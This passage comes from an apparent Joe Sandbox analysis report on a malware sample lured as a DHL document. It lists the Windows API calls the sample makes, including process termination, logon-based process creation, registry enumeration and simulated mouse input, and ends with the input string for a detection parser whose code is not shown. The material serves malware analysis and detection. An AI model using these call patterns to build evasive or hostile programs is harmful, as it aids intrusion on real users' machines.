  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 007D9EDA
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 007D9EED
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 007D9F00
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 007D9F13
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 007D9F26
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 007D9F39
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 007D9F4C
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 007D9F5F
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 007D9F72
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 007D9F85
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 007D9F98
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 007D9FAB
  • Part of subcall function 007D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 007D9FBE
• __mtinitlocks.LIBCMT ref: 007D9AEB
• __mtterm.LIBCMT ref: 007D9AF4
  • Part of subcall function 007D9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,007D9AF9,007D7CD0,0086A0B8,00000014), ref: 007D9C56
  • Part of subcall function 007D9B5C: _free.LIBCMT ref: 007D9C5D
  • Part of subcall function 007D9B5C: DeleteCriticalSection.KERNEL32(0086EC00,?,?,007D9AF9,007D7CD0,0086A0B8,00000014), ref: 007D9C7F
• __calloc_crt.LIBCMT ref: 007D9B19
• __initptd.LIBCMT ref: 007D9B3B
• GetCurrentThreadId.KERNEL32 ref: 007D9B42
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: e2bdd5a1e7a03d1bf4654377ac69b7a5852d4d5cf22778862421f8eb3abaccfb
• Instruction ID: 994b744120bebb615da7f65a0931b148cdd12f4ecffe58d6a1c90e2479a1fc1b
• Opcode Fuzzy Hash: e2bdd5a1e7a03d1bf4654377ac69b7a5852d4d5cf22778862421f8eb3abaccfb
• Instruction Fuzzy Hash: A9F09672609711A9E7747B74BC0B75A36B1AF42730F214A1BF750C53D2FF68884181A1
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007D3F85), ref: 007D4085
• GetProcAddress.KERNEL32(00000000), ref: 007D408C
• EncodePointer.KERNEL32(00000000), ref: 007D4097
• DecodePointer.KERNEL32(007D3F85), ref: 007D40B2
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: b86b4d7196a02d8fec568bf1ddd03c315e462be4330cc9a02b874cf8960d96ae
• Instruction ID: 7620515cb44702ffe3540309661e4ce6352a7569dd5bd44bf699812e99f9be91
• Opcode Fuzzy Hash: b86b4d7196a02d8fec568bf1ddd03c315e462be4330cc9a02b874cf8960d96ae
• Instruction Fuzzy Hash: C8E0BF70A85304DFDB10AF71ED0DB053BA5B744743F504436F215D12B5CB7A8644DA66
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
• Instruction ID: 595f90d89559d2f8e771d6297e49bbef170ce5a94e320344a98630cc0b3a1a9b
• Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
• Instruction Fuzzy Hash: 01617A3050025ADBCB01EF64CC8ABFE37A9EF55308F044519FA559B292EA38E955CB90
APIs
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
  • Part of subcall function 00830E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008302BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008302FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00830320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00830349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0083038C
• RegCloseKey.ADVAPI32(00000000), ref: 00830399
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: 383666c7b056dbd58167368ea81e3eb7840a68343fa16e943101e7a2b831e496
• Instruction ID: 30f99bf4a66f672d81759713cbe63d3f4cbabb4fe0044fd4a36ac7172be99beb
• Opcode Fuzzy Hash: 383666c7b056dbd58167368ea81e3eb7840a68343fa16e943101e7a2b831e496
• Instruction Fuzzy Hash: 18514631208204EFC705EF68C899EABBBE9FF85314F04491DF595872A2DB35E905CB92
APIs
• GetMenu.USER32(?), ref: 008357FB
• GetMenuItemCount.USER32(00000000), ref: 00835832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0083585A
• GetMenuItemID.USER32(?,?), ref: 008358C9
• GetSubMenu.USER32(?,?), ref: 008358D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00835928
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: c80b57fccb2e219c5852f0eb417cc659a19e5155fbb57afa05cfb71be13287d6
• Instruction ID: 09acd538b348af4d06ea3c38c87b9d672d6adc670fc8357c64318ccd915fde71
• Opcode Fuzzy Hash: c80b57fccb2e219c5852f0eb417cc659a19e5155fbb57afa05cfb71be13287d6
• Instruction Fuzzy Hash: 88512775E00619EFCB11AF64C845AAEBBB5FF88320F104469E951AB351CB74AE418B90
APIs
• VariantInit.OLEAUT32(?), ref: 0080EF06
• VariantClear.OLEAUT32(00000013), ref: 0080EF78
• VariantClear.OLEAUT32(00000000), ref: 0080EFD3
• _memmove.LIBCMT ref: 0080EFFD
• VariantClear.OLEAUT32(?), ref: 0080F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0080F078
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: 74cc4ba8390e0fa0b997c18d261d05dc70ff3927f40ef984c6797c3845e2ff0c
• Instruction ID: 01583010e6c1ee0b83602d143b064b1fa402aa743d07925af7dd41505d649b77
• Opcode Fuzzy Hash: 74cc4ba8390e0fa0b997c18d261d05dc70ff3927f40ef984c6797c3845e2ff0c
• Instruction Fuzzy Hash: AC516DB5A00209DFCB24CF58C884AAAB7F8FF4C314B158569EA59DB342E735E911CB90
APIs
• _memset.LIBCMT ref: 00812258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008122A3
• IsMenu.USER32(00000000), ref: 008122C3
• CreatePopupMenu.USER32 ref: 008122F7
• GetMenuItemCount.USER32(000000FF), ref: 00812355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00812386
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 2970ddb5723c9da0b099dd9d1a3f87461e14a78537e184725f3242b03611a9ca
• Instruction ID: f8211678de4f0322478afae6e174ebdad0efac28862e50f4abbfd3a25b6ba83c
• Opcode Fuzzy Hash: 2970ddb5723c9da0b099dd9d1a3f87461e14a78537e184725f3242b03611a9ca
• Instruction Fuzzy Hash: 66519C70A00209DBDF21CF68D888BEDBBF9FF45318F104569E821D72A1D37489A5CB61
APIs
  • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 007B179A
• GetWindowRect.USER32(?,?), ref: 007B17FE
• ScreenToClient.USER32(?,?), ref: 007B181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007B182C
• EndPaint.USER32(?,?), ref: 007B1876
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
• Opcode ID: acaed46b7bd1235222fa63a1f6159c4ff63a31267c4ae2423a5bfcae59de85ed
• Instruction ID: 015e125495c6a21c3f8be5d2630fa415b003df7f88fea716150ea660bd8ddb5e
• Opcode Fuzzy Hash: acaed46b7bd1235222fa63a1f6159c4ff63a31267c4ae2423a5bfcae59de85ed
• Instruction Fuzzy Hash: BC41BF30500600EFD710DF25CC98FAB7BE8FB4A724F540629F6A8872A2D7749845DBA2
APIs
• ShowWindow.USER32(008757B0,00000000,01226D28,?,?,008757B0,?,0083B5A8,?,?), ref: 0083B712
• EnableWindow.USER32(00000000,00000000), ref: 0083B736
• ShowWindow.USER32(008757B0,00000000,01226D28,?,?,008757B0,?,0083B5A8,?,?), ref: 0083B796
• ShowWindow.USER32(00000000,00000004,?,0083B5A8,?,?), ref: 0083B7A8
• EnableWindow.USER32(00000000,00000001), ref: 0083B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0083B7EF
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: ab2c05f84d6bcab042ff11fb01b3a9d4130a66439d7b933e156d311a91984a91
• Instruction ID: 9f1fef97315e47164e6ed460db9d50b5c77f775dcec1758f8a4d85a70d99992c
• Opcode Fuzzy Hash: ab2c05f84d6bcab042ff11fb01b3a9d4130a66439d7b933e156d311a91984a91
• Instruction Fuzzy Hash: FA414F74600244AFDB26CF24C49AB947BE1FBC5310F1881B9FA48CF6A2C771A856CBD1
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00824E41,?,?,00000000,00000001), ref: 008270AC
  • Part of subcall function 008239A0: GetWindowRect.USER32(?,?), ref: 008239B3
• GetDesktopWindow.USER32 ref: 008270D6
• GetWindowRect.USER32(00000000), ref: 008270DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0082710F
  • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
• GetCursorPos.USER32(?), ref: 0082713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00827199
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 2a24668935bbb85307645d7d34c37da9861a31abf63396ed71132eca34fa7add
• Instruction ID: 9e35d9d1b657a6083a1a7b3ebfab9b31ac803509740f79bf576f2e40976daa78
• Opcode Fuzzy Hash: 2a24668935bbb85307645d7d34c37da9861a31abf63396ed71132eca34fa7add
• Instruction Fuzzy Hash: 0731CF72509315ABD720DF14D849E9BBBAAFFC8314F00092AF585D7192DA30EA59CBD2
APIs
  • Part of subcall function 008080A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008080C0
  • Part of subcall function 008080A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008080CA
  • Part of subcall function 008080A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008080D9
  • Part of subcall function 008080A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008080E0
  • Part of subcall function 008080A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008080F6
• GetLengthSid.ADVAPI32(?,00000000,0080842F), ref: 008088CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 008088D6
• HeapAlloc.KERNEL32(00000000), ref: 008088DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 008088F6
• GetProcessHeap.KERNEL32(00000000,00000000,0080842F), ref: 0080890A
• HeapFree.KERNEL32(00000000), ref: 00808911
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
• Opcode ID: 4db69268974742f6b5202a1c1b35375e290f8a937ca0df90da4bf3c267c36739
• Instruction ID: 234614577c3730f21902ab82dfb3bbdf6f66ccc5633f57ec5836f69dde311f07
• Opcode Fuzzy Hash: 4db69268974742f6b5202a1c1b35375e290f8a937ca0df90da4bf3c267c36739
• Instruction Fuzzy Hash: 1011B131901609FFDB55AFA4DC09FBE7B68FB84315F108428E985D7251CB329D84DBA0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008085E2
• OpenProcessToken.ADVAPI32(00000000), ref: 008085E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008085F8
• CloseHandle.KERNEL32(00000004), ref: 00808603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00808632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00808646
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: c078fe6c5b1b1158efbeb808ac431167737ac4037fcaf06d3ecfac71c36bd3f6
• Instruction ID: c4b699fe1da7db5edd9524ce2401cddf6cd1b0d0fdfad89b7adde5d8766f213e
• Opcode Fuzzy Hash: c078fe6c5b1b1158efbeb808ac431167737ac4037fcaf06d3ecfac71c36bd3f6
• Instruction Fuzzy Hash: 2F11477250124DEBDF118FA8DD49BDA7BA9FB48304F044065FE04A21A1C7728DA0ABA0
APIs
• GetDC.USER32(00000000), ref: 0080B7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0080B7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0080B7CD
• ReleaseDC.USER32(00000000,00000000), ref: 0080B7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0080B7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 0080B7FE
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: dcb57d73c531395fd4d46d0257d29c1e810dca73b3ddc6181c4c8d4a6f4de606
• Instruction ID: 3191c331ebc816728df3651810f071c83a7d3773b6a21ec3305686369161444a
• Opcode Fuzzy Hash: dcb57d73c531395fd4d46d0257d29c1e810dca73b3ddc6181c4c8d4a6f4de606
• Instruction Fuzzy Hash: F9014475E00619BBEB109BA69D45E5EBFB8FB88751F004075FB04E7292D6709C10CF91
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D0193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 007D019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D01A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D01B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 007D01B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007D01C1
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 11831a9fd92fd6ab0ac89772cd5ce89b3d9b0eacc10751cdd4f143d66574d24a
• Instruction ID: 2389469e46fcc0e0310954b44cfb06e1967d85eacf42f9a60f082ba8443034ae
• Opcode Fuzzy Hash: 11831a9fd92fd6ab0ac89772cd5ce89b3d9b0eacc10751cdd4f143d66574d24a
• Instruction Fuzzy Hash: 730148B09017597DE3008F5A8C85A52FEA8FF59354F00411BA15847942C7B5A864CBE5
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008153F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0081540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0081541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0081542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00815437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0081543E
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 3e618e7124206926868ed933bea96075780784b9cb1c30eca3fdf38a727c513a
• Instruction ID: c14759b3b83b0d1c06130b88646169e4efdaee92876a0e7a3203ef3dcb341eea
• Opcode Fuzzy Hash: 3e618e7124206926868ed933bea96075780784b9cb1c30eca3fdf38a727c513a
• Instruction Fuzzy Hash: 79F06D32A40558BBE3215BA2EC0EEEF7A7CFFD6B11F000569FA05D1062E7A01A0186F5
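Added example, not part of the Joe Sandbox report and not AutoIt code: a small parser for the per-function "APIs" listing shape used throughout this section (bullet, Api.Module(args), ref: address, with nested "Part of subcall function" lines), plus a few hand-written rules that flag call patterns worth a second look, such as the WM_CLOSE followed by OpenProcess(PROCESS_ALL_ACCESS) and TerminateProcess sequence above, the CreateProcessWithLogonW call earlier on the page, and mouse_event input synthesis. The SAMPLE string is constructed from three of the report's own entries; the rule names and the triage output format are this example's own.

```python
# Added example (not from the Joe Sandbox report or from AutoIt): parse the
# per-function "APIs" listing shape shown above and flag a few call patterns.
import re
from dataclasses import dataclass, field

# Constructed input: three entries copied in the shape of the report's listing.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008085E2
• OpenProcessToken.ADVAPI32(00000000), ref: 008085E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008085F8
• CloseHandle.KERNEL32(00000004), ref: 00808603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00808632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00808646
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008153F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0081540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0081541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 0081542D
• TerminateProcess.KERNEL32(00000000,00000000,?), ref: 00815437
• CloseHandle.KERNEL32(00000000,?), ref: 0081543E
APIs
• GetForegroundWindow.USER32(?,?,00824E41,?,?,00000000,00000001), ref: 008270AC
  • Part of subcall function 008239A0: GetWindowRect.USER32(?,?), ref: 008239B3
• GetDesktopWindow.USER32 ref: 008270D6
• GetWindowRect.USER32(00000000), ref: 008270DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0082710F
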